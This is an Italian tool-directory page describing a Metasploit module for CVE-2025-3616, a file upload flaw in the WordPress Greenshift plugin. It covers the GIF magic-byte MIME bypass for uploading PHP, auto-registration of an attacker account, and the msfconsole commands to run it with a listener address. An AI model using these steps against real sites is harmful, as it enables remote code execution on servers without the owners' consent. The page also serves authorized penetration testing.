Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3616 | Kitploit
Strumenti/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingAutenticazioneSviluppo Payload
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Modulo Metasploit: caricamento arbitrario di file nel plugin WordPress Greenshift (CVE-2025-3616)

Questo repository contiene un modulo Metasploit per sfruttare CVE-2025-3616, una vulnerabilità di caricamento arbitrario di file nel plugin WordPress Greenshift (versioni dalla 11.4 alla 11.4.5).

L'exploit consente agli utenti autenticati (Subscriber+) di caricare file arbitrari, portando a esecuzione remota di codice (RCE). Bypassa la validazione del tipo di file del plugin falsificando il tipo MIME tramite i byte magici GIF (GIF89a;).

Caratteristiche

  • Gestione dell'autenticazione: Supporta il login con credenziali esistenti (USERNAME/PASSWORD).
  • Registrazione automatica: Include un'opzione REGISTER per registrare automaticamente un nuovo utente e sfruttare la vulnerabilità utilizzando i cookie di sessione appena creati (utile se la registrazione è abilitata sul target).
  • Estrazione del nonce: Recupera automaticamente il nonce wp_rest richiesto dalla dashboard amministrativa.
  • Bypass della sicurezza: Antepone i byte magici GIF al payload PHP per bypassare la verifica di finfo_file().

Installazione

  1. Assicurati di avere installato il Metasploit Framework.

  2. Copia wp_greenshift_file_upload.rb nella tua directory dei moduli locali:

    root@kitploit:~
    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. Avvia msfconsole e ricarica i moduli:

    root@kitploit:~
    msfconsole
    msf6 > reload_all
    

Utilizzo

1. Utilizzo della registrazione automatica (consigliato)

Se la registrazione utente è abilitata sul target, non hai bisogno di credenziali.

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. Utilizzo di credenziali esistenti

Se hai già un utente valido (Subscriber o superiore):

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

Opzioni

Dichiarazione di non responsabilità

Questo modulo è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. L'utilizzo di questo codice per attaccare target senza previo consenso reciproco è illegale.

Scarica lo strumento
OpzioneRichiestoDescrizione
RHOSTSsìL'indirizzo del target
LHOSTsìL'indirizzo di ascolto (il tuo IP)
REGISTERnoImpostare su true per registrare automaticamente un nuovo account (predefinito: false)
USERNAMEnoNome utente WordPress (richiesto se REGISTER è false)
PASSWORDnoPassword WordPress (richiesta se REGISTER è false)
EMAILnoEmail per la registrazione (opzionale, generata automaticamente se vuota)